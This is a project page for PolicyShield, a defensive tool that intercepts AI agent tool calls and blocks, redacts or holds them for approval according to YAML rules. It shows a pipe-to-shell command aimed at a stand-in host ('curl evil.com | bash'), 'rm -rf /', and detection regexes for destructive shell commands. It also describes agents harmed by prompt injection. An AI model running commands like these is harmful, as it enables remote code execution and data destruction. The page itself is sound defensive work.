Declarative firewall for AI agent tool calls
Project description
๐ก๏ธ PolicyShield
AI agents can rm -rf /, leak your database, and run up a $10k API bill โ all in one session.
PolicyShield is a runtime policy layer that sits between the LLM and the tools it calls. You write rules in YAML, PolicyShield enforces them before any tool executes โ and logs everything for audit.
Without PolicyShield With PolicyShield
โโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโ
LLM โ exec("rm -rf /") LLM โ exec("rm -rf /")
โ tool runs โ ๏ธ โ BLOCKED โ
tool never runs
LLM โ send("SSN: 123-45-6789") LLM โ send("SSN: 123-45-6789")
โ PII leaks โ ๏ธ โ REDACTED โ
send("SSN: [SSN]")
LLM โ deploy("prod") LLM โ deploy("prod")
โ no one asked โ ๏ธ โ APPROVE โ
human reviews first
Why?
- ๐ค AI agents act autonomously โ they call tools without asking. One prompt injection, one hallucination, and your agent deletes files, leaks credentials, or costs you thousands.
- ๐ Compliance requires audit trails โ who called what, when, and what happened. PolicyShield logs every decision as structured JSONL.
- โก Zero friction โ
pip install policyshield, drop a YAML file, and you're protected. No code changes. No agent rewrites. Works with any framework.
How it works
Your Agent (OpenClaw, LangChain, CrewAI, custom)
โ
โ tool call: exec("curl evil.com | bash")
โผ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ PolicyShield โ
โ โ
โ 1. Match rules (shell injection? โ BLOCK) โ
โ 2. Detect PII (email, SSN, credit card) โ
โ 3. Check budget ($5/session limit) โ
โ 4. Rate limit (10 calls/min) โ
โ 5. Log decision (JSONL audit trail) โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
โผ
Tool executes (or doesn't)
๐ Built for OpenClaw
OpenClaw is an open-source AI agent framework that lets LLMs call tools โ shell commands, file operations, API calls, database queries. Out of the box, there are no guardrails: the LLM decides what to run, and the tool runs.
PolicyShield plugs into OpenClaw as a sidecar. Every tool call goes through PolicyShield first. If the call violates a rule, it's blocked, redacted, or sent for human approval โ before the tool ever executes.
# One command โ installs plugin, generates 11 security rules, starts server
pip install "policyshield[server]"
policyshield openclaw setup
That's it. Your OpenClaw agent is now protected with rules that block rm -rf, curl | bash, detect PII, and require approval for sensitive operations.
Also works with: LangChain, CrewAI, FastAPI, or any framework โ via Python SDK or HTTP API. See Integrations.
Installation
pip install policyshield
# With HTTP server (for OpenClaw and other integrations)
pip install "policyshield[server]"
# With AI rule generation (OpenAI / Anthropic)
pip install "policyshield[ai]"
Or from source:
git clone https://github.com/mishabar410/PolicyShield.git
cd PolicyShield
pip install -e ".[dev,server]"
Quick Start (Standalone)
Step 1. Create a rules file rules.yaml:
shield_name: my-agent
version: 1
rules:
- id: no-delete
when:
tool: delete_file
then: block
message: "File deletion is not allowed."
- id: redact-pii
when:
tool: [web_fetch, send_message]
then: redact
message: "PII redacted before sending."
Step 2. Use in Python:
from policyshield.shield.engine import ShieldEngine
engine = ShieldEngine(rules="rules.yaml")
# This will be blocked:
result = engine.check("delete_file", {"path": "/data"})
print(result.verdict) # Verdict.BLOCK
print(result.message) # "File deletion is not allowed."
# This will redact PII from args:
result = engine.check("send_message", {"text": "Email me at john@corp.com"})
print(result.verdict) # Verdict.REDACT
print(result.modified_args) # {"text": "Email me at [EMAIL]"}
Step 3. Validate your rules:
policyshield validate rules.yaml
policyshield lint rules.yaml
Or scaffold a full project:
# Secure preset: default BLOCK, fail-closed, 5 built-in detectors
policyshield init --preset secure --no-interactive
# Check your security posture
policyshield doctor
โก OpenClaw Integration
PolicyShield works as a sidecar to OpenClaw โ it intercepts every tool call the LLM makes and enforces your rules before the tool executes.
OpenClaw Agent PolicyShield Server
โโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโ
โ LLM calls โ HTTP check โ 11 YAML rules โ
โ exec("rmโฆ") โโโโโโโโโโโโโโ โ โ โ
โ โ BLOCK โโโโโโ match โ verdict โ
โ Tool NOT โ โ โ
โ executed โ โ PII detection โ
โโโโโโโโโโโโโโโโ โ Rate limiting โ
โ Audit trail โ
โโโโโโโโโโโโโโโโโโโโ
Verified with OpenClaw 2026.2.13 and PolicyShield 0.10.0.
Quick Setup (one command)
pip install "policyshield[server]"
policyshield openclaw setup
This runs 5 steps automatically:
| Step | What happens |
|---|---|
| 1 | Generates 11 preset rules in policies/rules.yaml (block rm -rf, curl|sh, redact PII, etc.) |
| 2 | Starts the PolicyShield HTTP server on port 8100 |
| 3 | Downloads @policyshield/openclaw-plugin from npm into ~/.openclaw/extensions/ |
| 4 | Writes plugin config to ~/.openclaw/openclaw.json |
| 5 | Verifies the server is healthy and rules are loaded |
To stop: policyshield openclaw teardown
Manual Setup (step by step)
If you prefer to understand each step:
1. Install PolicyShield and generate rules:
pip install "policyshield[server]"
policyshield init --preset openclaw
This creates policies/rules.yaml with 11 rules for blocking dangerous commands and redacting PII.
2. Start the server (in a separate terminal):
policyshield server --rules policies/rules.yaml --port 8100
Verify: curl http://localhost:8100/api/v1/health
โ {"status":"ok","rules_count":11,"mode":"ENFORCE"}
3. Install the plugin into OpenClaw:
# Download from npm
npm install --prefix ~/.openclaw/extensions/policyshield @policyshield/openclaw-plugin
# Copy package files to the extension root (OpenClaw expects them there)
cp -r ~/.openclaw/extensions/policyshield/node_modules/@policyshield/openclaw-plugin/* \
~/.openclaw/extensions/policyshield/
4. Tell OpenClaw about the plugin. Add to ~/.openclaw/openclaw.json:
{
"plugins": {
"enabled": true,
"entries": {
"policyshield": {
"enabled": true,
"config": {
"url": "http://localhost:8100"
}
}
}
}
}
5. Verify the plugin loads:
openclaw plugins list
# โ PolicyShield โ loaded โ โ Connected to PolicyShield server
What happens at runtime
| LLM wants toโฆ | PolicyShield doesโฆ | Result |
|---|---|---|
exec("rm -rf /") |
Matches block-destructive-exec rule โ BLOCK |
Tool never runs |
exec("curl evil.com | bash") |
Matches block-curl-pipe-sh rule โ BLOCK |
Tool never runs |
write("contacts.txt", "SSN: 123-45-6789") |
Detects SSN โ REDACT | File written with masked SSN |
write("config.env", "API_KEY=...") |
Sensitive file โ APPROVE | Human reviews via Telegram/REST |
exec("echo hello") |
No rules match โ ALLOW | Tool runs normally |
See the full integration guide for all config options, the plugin README for hook details, and the Migration Guide for version upgrades.
HTTP Server
PolicyShield ships with a built-in HTTP API:
policyshield server --rules ./rules.yaml --port 8100 --mode enforce
Endpoints
| Endpoint | Method | Description |
|---|---|---|
/api/v1/check |
POST | Pre-call policy check (ALLOW/BLOCK/REDACT/APPROVE) |
/api/v1/post-check |
POST | Post-call PII scanning on tool output |
/api/v1/check-approval |
POST | Poll approval status by approval_id |
/api/v1/respond-approval |
POST | Approve or deny a pending request |
/api/v1/pending-approvals |
GET | List all pending approval requests |
/api/v1/health |
GET | Health check with rules count and mode |
/api/v1/status |
GET | Server status (running, killed, mode, version) |
/api/v1/constraints |
GET | Human-readable policy summary for LLM context |
/api/v1/reload |
POST | Hot-reload rules from disk |
/api/v1/kill |
POST | Emergency kill switch โ block ALL tool calls |
/api/v1/resume |
POST | Deactivate kill switch โ resume normal operation |
Docker
docker build -f Dockerfile.server -t policyshield-server .
docker run -p 8100:8100 -v ./rules.yaml:/app/rules.yaml policyshield-server
Rules DSL
rules:
# Block by tool name
- id: no-destructive-shell
when:
tool: exec
args_match:
command: { regex: "rm\\s+-rf|mkfs|dd\\s+if=" }
then: block
severity: critical
# Block multiple tools at once
- id: no-external-pii
when:
tool: [web_fetch, web_search, send_email]
then: redact
# Human approval required
- id: approve-file-delete
when:
tool: delete_file
then: approve
approval_strategy: per_rule
# Session-based conditions
- id: rate-limit-exec
when:
tool: exec
session:
tool_count.exec: { gt: 60 }
then: block
message: "exec rate limit exceeded"
# Chain rule: detect data exfiltration
- id: anti-exfiltration
when:
tool: send_email
chain:
- tool: read_database
within_seconds: 120
then: block
severity: critical
message: "Potential data exfiltration: read_database โ send_email"
# Rate limiting
rate_limits:
- tool: web_fetch
max_calls: 10
window_seconds: 60
per_session: true
# Custom PII patterns
pii_patterns:
- name: EMPLOYEE_ID
pattern: "EMP-\\d{6}"
Built-in PII detection: EMAIL, PHONE, CREDIT_CARD, SSN, IBAN, IP, PASSPORT, DOB + custom patterns.
Features
Core
| Category | What you get |
|---|---|
| YAML DSL | Declarative rules with regex, glob, exact match, session conditions |
| Verdicts | ALLOW ยท BLOCK ยท REDACT ยท APPROVE (human-in-the-loop) |
| PII Detection | EMAIL, PHONE, CREDIT_CARD, SSN, IBAN, IP, PASSPORT, DOB + custom patterns |
| Built-in Detectors | Path traversal, shell injection, SQL injection, SSRF, URL schemes โ zero-config |
| Kill Switch | policyshield kill / POST /api/v1/kill โ block ALL calls instantly |
| Chain Rules | Temporal conditions (when.chain) โ detect multi-step attack patterns |
| Rate Limiting | Per-tool, per-session, global, and adaptive (burst detection) rate limiting |
| Approval Flow | InMemory and Telegram backends with circuit breaker and health checks |
| Hot Reload | File-watcher auto-reloads rules on change |
| Trace & Audit | JSONL log, search, stats, violations, CSV/HTML export, rotation & retention |
Server & Integrations
| Category | What you get |
|---|---|
| HTTP Server | FastAPI server with TLS, API rate limiting, and 11 REST endpoints |
| OpenClaw Plugin | Native plugin with before/after hooks and policy injection |
| Async Engine | Full async/await support for FastAPI, aiohttp, async agents |
| Input Sanitizer | Normalize args, block prompt injection patterns |
| Output Policy | Post-call response scanning with block patterns and size limits |
| Honeypot Tools | Decoy tools that trigger on prompt injection โ always block, even in AUDIT mode |
| Docker | Container-ready with Dockerfile.server and docker-compose |
Developer Experience
| Category | What you get |
|---|---|
| Doctor | policyshield doctor โ 10-check health scan with A-F security grading |
| Auto-Rules | policyshield generate-rules --from-openclaw โ zero-config rule generation |
| Rule Testing | YAML test cases for policies (policyshield test) |
| Rule Linter | Static analysis: 7 checks + multi-file validation + dead rule detection |
| Replay & Simulation | Re-run JSONL traces against new rules (policyshield replay) |
Advanced features (shadow mode, canary, dashboards, OTel, etc.)
| Category | What you get |
|---|---|
| Rule Composition | include: / extends: for rule inheritance and modularity |
| Plugin System | Extensible detector API โ register custom detectors without forking |
| Budget Caps | USD-based per-session and per-hour cost limits |
| Shadow Mode | Test new rules in production (dual-path evaluation, no blocking) |
| Canary Deployments | Roll out rules to N% of sessions, auto-promote after duration |
| Dynamic Rules | Fetch rules from HTTP/HTTPS with periodic refresh |
| OpenTelemetry | OTLP export to Jaeger/Grafana (spans + metrics) |
| AI Rule Writer | Generate YAML rules from natural language (policyshield generate) |
| Cost Estimator | Token/dollar cost estimation per tool call and model |
| Alert Engine | 5 condition types with Console, Webhook, Slack, Telegram backends |
| Dashboard | FastAPI REST API + WebSocket live stream + dark-themed SPA |
| Prometheus | /metrics endpoint with per-tool, PII, and approval labels + Grafana preset |
| Compliance Reports | HTML reports: verdicts, violations, PII stats, rule coverage |
| Incident Timeline | Chronological session timeline for post-mortems |
| Config Migration | policyshield migrate โ auto-migrate YAML between versions |
Other Integrations
LangChain
from policyshield.integrations.langchain import PolicyShieldTool, shield_all_tools
safe_tool = PolicyShieldTool(wrapped_tool=my_tool, engine=engine)
safe_tools = shield_all_tools([tool1, tool2], engine)
CrewAI
from policyshield.integrations.crewai import shield_crewai_tools
safe_tools = shield_crewai_tools([tool1, tool2], engine)
CLI
policyshield validate ./policies/ # Validate rules
policyshield lint ./policies/rules.yaml # Static analysis (7 checks)
policyshield test ./policies/ # Run YAML test cases
policyshield server --rules ./rules.yaml # Start HTTP server
policyshield server --rules ./rules.yaml --port 8100 --mode audit
policyshield server --rules ./rules.yaml --tls-cert cert.pem --tls-key key.pem
policyshield trace show ./traces/trace.jsonl
policyshield trace violations ./traces/trace.jsonl
policyshield trace stats --dir ./traces/ --format json
policyshield trace search --tool exec --verdict BLOCK
policyshield trace cost --dir ./traces/ --model gpt-4o
policyshield trace export ./traces/trace.jsonl -f html
# Launch the live web dashboard
policyshield trace dashboard --port 8000 --prometheus
# Replay traces against new rules
policyshield replay ./traces/trace.jsonl --rules ./new-rules.yaml --changed-only
# Simulate a rule without traces
policyshield simulate --rule new_rule.yaml --tool exec --args '{"cmd":"ls"}'
# Generate rules from templates (offline)
policyshield generate --template --tools delete_file send_email -o rules.yaml
# Generate rules with AI (requires OPENAI_API_KEY)
policyshield generate "Block all file deletions and require approval for deploys"
# Auto-generate rules from OpenClaw or tool list
policyshield generate-rules --from-openclaw --url http://localhost:3000
policyshield generate-rules --tools exec,write_file,delete_file -o policies/rules.yaml
# Compliance report for auditors
policyshield report --traces ./traces/ --format html
# Incident timeline for post-mortems
policyshield incident session_abc123 --format html
# Config migration between versions
policyshield migrate --from 0.11 --to 1.0 rules.yaml
# Kill switch โ emergency stop
policyshield kill --port 8100 --reason "Incident response"
policyshield resume --port 8100
# Health check
policyshield doctor --config policyshield.yaml --rules rules.yaml
policyshield doctor --json
# Initialize a new project
policyshield init --preset secure --no-interactive
Docker
# Run the HTTP server
docker build -f Dockerfile.server -t policyshield-server .
docker run -p 8100:8100 -v ./rules:/app/rules policyshield-server
# Validate rules
docker compose run policyshield validate policies/
# Lint rules
docker compose run lint
# Run tests
docker compose run test
Examples
| Example | Description |
|---|---|
langchain_demo.py |
LangChain tool wrapping |
async_demo.py |
Async engine usage |
openclaw_rules.yaml |
OpenClaw preset rules (11 rules) |
chain_rules.yaml |
Chain rule examples (anti-exfiltration, retry storm) |
policies/ |
Production-ready rule sets (security, compliance, full) |
Community Rule Packs
| Pack | Rules | Focus |
|---|---|---|
gdpr.yaml |
8 | EU data protection, cross-border transfers |
hipaa.yaml |
9 | PHI protection, patient record safety |
pci-dss.yaml |
9 | Cardholder data, payment gateway enforcement |
How does PolicyShield compare to alternatives? See the Comparison page.
Benchmarks
Measured on commodity hardware (Apple M-series, Python 3.13). Target: <5ms sync, <10ms async.
| Operation | p50 | p99 | Target |
|---|---|---|---|
| Sync check (ALLOW) | 0.01ms | 0.01ms | <5ms โ |
| Sync check (BLOCK) | 0.01ms | 0.01ms | <5ms โ |
| Async check | 0.05ms | 0.10ms | <10ms โ |
Run benchmarks yourself:
pytest tests/test_benchmark.py -m benchmark -v -s
Troubleshooting
| Problem | Solution |
|---|---|
Connection refused on plugin install |
Start PolicyShield server first: policyshield server --rules rules.yaml |
| Server starts but plugin gets timeouts | Check port matches โ default is 8100. Configure in OpenClaw: openclaw config set plugins.policyshield.url http://localhost:8100 |
| Rules not reloading after edit | Hot-reload watches the file passed to --rules. Or call POST /api/v1/reload manually |
policyshield: command not found |
Install with server extra: pip install "policyshield[server]" |
| PII not detected in non-English text | Current PII detector is regex-based (L0). RU patterns (INN, SNILS, passport) are supported. NER-based L1 detection is on the roadmap |
For OpenClaw-specific issues, see the full integration guide. For upgrading between versions, see the Compatibility & Migration Guide.
Development
git clone https://github.com/mishabar410/PolicyShield.git
cd PolicyShield
python -m venv .venv && source .venv/bin/activate
pip install -e ".[dev,server]"
pytest tests/ -v # 1192+ tests
ruff check policyshield/ tests/ # Lint
ruff format --check policyshield/ tests/ # Format check
๐ Documentation: mishabar410.github.io/PolicyShield
License
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file policyshield-0.11.0.tar.gz.
File metadata
- Download URL: policyshield-0.11.0.tar.gz
- Upload date:
- Size: 515.3 kB
- Tags: Source
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.7
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
68a957ea895cab12cbcd50604eb21745c53292ad111c2e0d80df205d018d9dcb
|
|
| MD5 |
58355444a940743220eca7b8df95de16
|
|
| BLAKE2b-256 |
40df9c482e0eb484aa8b569111544395fd9f7971bba9ca8f8609387488c40eca
|
Provenance
The following attestation bundles were made for policyshield-0.11.0.tar.gz:
Publisher:
release.yml on mishabar410/PolicyShield
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
policyshield-0.11.0.tar.gz -
Subject digest:
68a957ea895cab12cbcd50604eb21745c53292ad111c2e0d80df205d018d9dcb - Sigstore transparency entry: 973280407
- Sigstore integration time:
-
Permalink:
mishabar410/PolicyShield@f45bd8b9fa17f7920e60a65c0f8c49a517fb885a -
Branch / Tag:
refs/tags/v0.11.0 - Owner: https://github.com/mishabar410
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
release.yml@f45bd8b9fa17f7920e60a65c0f8c49a517fb885a -
Trigger Event:
push
-
Statement type:
File details
Details for the file policyshield-0.11.0-py3-none-any.whl.
File metadata
- Download URL: policyshield-0.11.0-py3-none-any.whl
- Upload date:
- Size: 167.0 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.7
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
0e80f9373a6ad0d49e6a958f35faee5c21a99faa6c16d7ea099363ad58ae4d4d
|
|
| MD5 |
c5086614128c87bd2bb63b79b25ccfc8
|
|
| BLAKE2b-256 |
4160a4c3adb05b95ed0a43d08da01a71c696919297ab7f8048328b74c62bd909
|
Provenance
The following attestation bundles were made for policyshield-0.11.0-py3-none-any.whl:
Publisher:
release.yml on mishabar410/PolicyShield
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
policyshield-0.11.0-py3-none-any.whl -
Subject digest:
0e80f9373a6ad0d49e6a958f35faee5c21a99faa6c16d7ea099363ad58ae4d4d - Sigstore transparency entry: 973280411
- Sigstore integration time:
-
Permalink:
mishabar410/PolicyShield@f45bd8b9fa17f7920e60a65c0f8c49a517fb885a -
Branch / Tag:
refs/tags/v0.11.0 - Owner: https://github.com/mishabar410
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
release.yml@f45bd8b9fa17f7920e60a65c0f8c49a517fb885a -
Trigger Event:
push
-
Statement type: